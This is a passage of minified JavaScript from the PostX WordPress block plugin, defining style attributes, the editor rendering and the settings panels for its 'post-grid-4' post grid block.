}"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},column:{type:"string",default:"2",style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{column}}, 1fr); }"},{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{column}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"450",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-layout5 .ultp-block-item .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout3 .ultp-block-item .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout4 .ultp-block-item .ultp-block-content-overlay {height: calc({{overlayHeight}}/2);} \n          {{ULTP}} .ultp-layout1 .ultp-block-item .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item .ultp-block-content-overlay {height: calc({{overlayHeight}}/2.5);} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:first-child .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item:first-child .ultp-block-content-overlay {height: calc({{overlayHeight}}/1.5);} \n          {{ULTP}} .ultp-block-row { min-height: {{overlayHeight}}; } \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } \n          @media (max-width: 768px) {\n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n            {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit; }\n          }"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:"0"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"loadMore"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["metaKey","queryNumber"],[{key:"queryNumPosts",default:{lg:5}},{key:"pagiAlign",default:{lg:"left"}},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"readMoreColor",default:"#fff"}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},67879:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(38219),r=l(62308),s=l(18781);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-3/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-3.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid3.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-3")]},edit:n.Z,save:()=>null})},12975:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(6544);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useRef:T,useState:_,useEffect:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=T(null),[l,B]=_(f.Ti),[U,M]=_(null),{setAttributes:A,name:H,attributes:N,context:j,className:Z,isSelected:O,clientId:R,attributes:{blockId:D,currentPostId:z,excerptLimit:F,metaStyle:W,metaShow:V,catShow:G,showImage:q,metaSeparator:$,titleShow:K,catStyle:J,catPosition:Y,titlePosition:X,excerptShow:Q,imgAnimation:ee,imgOverlayType:te,imgOverlay:le,metaList:oe,metaListSmall:ae,showSmallCat:ie,readMore:ne,readMoreText:re,readMoreIcon:se,overlayContentPosition:pe,showSmallBtn:ce,showSmallExcerpt:ue,metaPosition:de,showFullExcerpt:me,layout:ge,columnFlip:ye,titleAnimation:be,customCatColor:ve,onlyCatColor:he,contentTag:fe,titleTag:ke,showSeoMeta:we,titleLength:xe,metaMinText:Te,metaAuthorPrefix:_e,titleStyle:Ce,metaDateFormat:Ee,authorLink:Se,fallbackEnable:Pe,imgCropSmall:Le,imgCrop:Ie,vidIconEnable:Be,notFoundMessage:Ue,previewImg:Me,advanceId:Ae,paginationShow:He,headingShow:Ne,filterShow:je,paginationType:Ze,navPosition:Oe,dcEnabled:Re,dcFields:De,querySticky:ze,V4_1_0_CompCheck:{runComp:Fe}}}=e;function We(e){B({...l,selectedDC:e})}function Ve(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ge(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function qe(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function $e(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}C((()=>{(0,f.oA)(),$e()}),[]),C((()=>{const t=R.substr(0,6),l=L(I(R));(0,a.qi)(A,l,z,R),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[R]),C((()=>{const e=t.current;(0,b.o6)()&&0===N.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&($e(),t.current=N),e.isSelected!==O&&O&&(0,f.gT)(Ge,qe)):t.current=N}),[N]),C((()=>{ze&&A({queryNumber:"layout4"==ge?"4":"3"})}),[ze]);const Ke={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:N,setSection:Ge,section:l.section,clientId:R,context:j,setSelectedDc:We,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){We(e),qe("dc_group")}};let Je;if(D&&(Je=(0,m.Kh)(N,"ultimate-post/post-grid-4",D,(0,a.k0)())),Me&&!O)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Me});C((()=>{O&&N.previewImg&&A({previewImg:""})}),[e?.isSelected]);const Ye=x({...Ae&&{id:Ae},className:`ultp-block-${D} ${Z}`,onClick:e=>{e.stopPropagation(),Ge("general"),qe("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:Ke,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:Ke})),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-4",key:"layout",options:[{value:"layout1",img:"assets/img/layouts/pg4/l1.png",label:__("Layout 1","ultimate-post"),pro:!1},{value:"layout2",img:"assets/img/layouts/pg4/l2.png",label:__("Layout 2","ultimate-post"),pro:!0},{value:"layout3",img:"assets/img/layouts/pg4/l3.png",label:__("Layout 3","ultimate-post"),pro:!0},{value:"layout4",img:"assets/img/layouts/pg4/l4.png",label:__("Layout 4","ultimate-post"),pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Fe?"exclude":"dep"]:a.N2}],store:Ke}),(0,o.createElement)("div",Ye,Je&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Je}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ne||je||He)&&(0,o.createElement)(r.m,{attributes:N,setAttributes:A,onClick:()=>{Ge("heading"),qe("heading")},setSection:Ge,setToolbarSettings:qe}),function(){const e=`${fe}`,t=(e,t)=>(0,b.o6)()&&Re&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:De,settingsOnClick:(e,t)=>{e?.stopPropagation(),qe(t)},selectedDC:l.selectedDC,setSelectedDc:We,setAttributes:A,dcFields:De});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)(E,null,(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${ge} ultp-block-content-${ye}`},l.postsList.map(((l,a)=>{const r=0==a?JSON.parse(oe.replaceAll("u0022",'"')):JSON.parse(ae.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ${be?"ultp-animation-"+be:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.A8,{imgOverlay:le,imgOverlayType:te,imgAnimation:ee,post:l,fallbackEnable:Pe,vidIconEnable:Be,catPosition:Y,imgCropSmall:Le,showImage:q,imgCrop:Ie,idx:a,showSmallCat:ie,Category:0!=a&&!ie||"aboveTitle"==Y?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:G,catStyle:J,catPosition:Y,customCatColor:ve,onlyCatColor:he,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}})),onClick:()=>{Ge("image"),qe("image")}}),Be&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{Ge("video"),qe("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${pe}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==Y&&(0==a||ie)&&(0,o.createElement)(i.Z,{post:l,catShow:G,catStyle:J,catPosition:Y,customCatColor:ve,onlyCatColor:he,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}}),t(6,l.ID),l.title&&K&&1==X&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Ge("title"),qe("title")}}),t(5,l.ID),V&&"top"==de&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:$,metaStyle:W,metaMinText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Ge("meta"),qe("meta")}}),t(4,l.ID),l.title&&K&&0==X&&(0,o.createElement)(d.Z,{title:l.title,headingTag:ke,titleLength:xe,titleStyle:Ce,onClick:e=>{Ge("title"),qe("title")}}),t(3,l.ID),(0==a||ue)&&Q&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:F,showFullExcerpt:me,showSeoMeta:we,onClick:e=>{Ge("excerpt"),qe("excerpt")}}),t(2,l.ID),(0==a||ce)&&ne&&(0,o.createElement)(u.Z,{readMoreText:re,readMoreIcon:se,titleLabel:l.title,onClick:()=>{Ge("read-more"),qe("read-more")}}),t(1,l.ID),V&&"bottom"==de&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:$,metaStyle:W,metaMinText:Te,metaAuthorPrefix:_e,metaDateFormat:Ee,authorLink:Se,onClick:e=>{Ge("meta"),qe("meta")}}),t(0,l.ID),(0,b.o6)()&&Re&&(0,o.createElement)(v.Z,{dcFields:De,setAttributes:A,startOnboarding:Ve,overlayMode:!0,inverseColor:!0})))))})))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ue})}(),He&&"navigation"==Ze&&"topRight"!=Oe&&(0,o.createElement)(c.Z,{onClick:()=>{Ge("pagination"),qe("pagination")}}))))}},6544:(e,t,l)=>{"use strict";l.d(t,{FP:()=>h,PR:()=>b,ZP:()=>v});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(87025);const{__}=wp.i18n,{Sections:d,Section:m}=l(92637),{default:g}=l(43581),{useEffect:y}=wp.element,b=8;function v({store:e}){const{queryType:t,titleAnimationArg:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:s}}=e.attributes,{context:p,section:b,settingTab:v,setSettingTab:h}=e;return y((()=>{(0,u.CH)(p,n,e,r)}),[n,r,e.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(g,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6832",store:e}),(0,o.createElement)(d,{settingTab:v,setSettingTab:h},(0,o.createElement)(m,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,exclude:["queryNumber","queryNumPosts"],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(m,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:e,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-4",key:"layout",label:__("Layout","ultimate-post"),options:[{value:"layout1",img:"assets/img/layouts/pg4/l1.png",label:__("Layout 1","ultimate-post"),pro:!1},{value:"layout2",img:"assets/img/layouts/pg4/l2.png",label:__("Layout 2","ultimate-post"),pro:!0},{value:"layout3",img:"assets/img/layouts/pg4/l3.png",label:__("Layout 3","ultimate-post"),pro:!0},{value:"layout4",img:"assets/img/layouts/pg4/l4.png",label:__("Layout 4","ultimate-post"),pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:1e3,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:8,data:{data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post")}}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:3,label:__("Number of Post","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:b.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:b.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:b.meta,hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:e,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:e,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:e}),(0,o.createElement)(a.fm,{store:e,include:l}),!s&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:b.heading,depend:"headingShow"}),"posts"!=t&&"customPosts"!=t&&(0,o.createElement)(a.B0,{isTab:!0,store:e,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:e,include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText"]}))),(0,o.createElement)(m,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function h({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:c,catPosition:u,titlePosition:d,excerptShow:m,readMore:g,metaPosition:y,catShow:b}=t.attributes,v=[i&&"bottom"==y,g,m,c&&0==d,i&&"top"==y,c&&1==d,b&&"aboveTitle"==u];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:v});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}}],exSettings:["paginationType"],exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta 